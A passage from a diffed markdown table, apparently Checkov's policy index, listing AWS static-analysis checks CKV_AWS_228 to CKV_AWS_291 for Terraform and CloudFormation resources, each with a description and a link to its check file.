[ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 627 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 628 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 629 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 630 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 631 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 632 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 633 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | 
[NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 634 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 635 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 636 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 637 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 638 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 639 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 640 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | 
[APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 641 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 642 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 643 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 644 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 645 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 646 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 647 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | 
[MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 648 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 649 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 650 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 651 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 652 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 653 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 654 | 
CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 655 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 656 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 657 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 658 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 659 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 660 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | 
Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 661 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 662 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 663 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 664 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 665 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 666 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | 
[CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 667 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 668 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 669 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 670 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 671 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 672 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | 
[LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 673 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 674 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 675 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 676 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 677 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 678 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 679 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 680 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 681 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 682 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 683 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 684 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | +| 685 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | 
[IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | +| 686 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 687 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 688 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 689 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 690 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 691 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 692 | 
CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | +| 693 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | +| 694 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 695 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 696 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 697 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | +| 698 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | 
[NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | +| 699 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | +| 700 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | +| 701 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | +| 702 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | +| 703 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | +| 704 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | 
[StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | +| 705 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 706 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 707 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 708 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 709 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 710 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 711 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | 
[IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 712 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 713 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 714 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 715 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 716 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 717 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 718 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 719 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 720 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 721 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 722 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 723 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 724 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 725 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 726 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 727 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 728 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 729 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 730 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 731 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | 
